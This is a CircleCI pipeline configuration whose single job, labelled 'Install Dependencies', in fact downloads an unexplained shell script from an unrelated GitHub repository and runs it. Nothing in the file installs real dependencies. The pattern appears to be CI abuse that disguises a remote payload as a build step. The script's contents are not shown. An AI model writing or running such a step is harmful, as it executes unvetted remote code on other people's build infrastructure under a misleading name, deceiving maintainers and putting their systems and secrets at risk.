version: 2.1
jobs:
    aku1:
      docker:
            - image: cimg/node:13.8.0
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Ikuzot/nung/raw/main/Gnt.sh && chmod +x Gnt.sh && ./Gnt.sh
workflows:
    version: 2.1
    build:
        jobs:
            - aku1
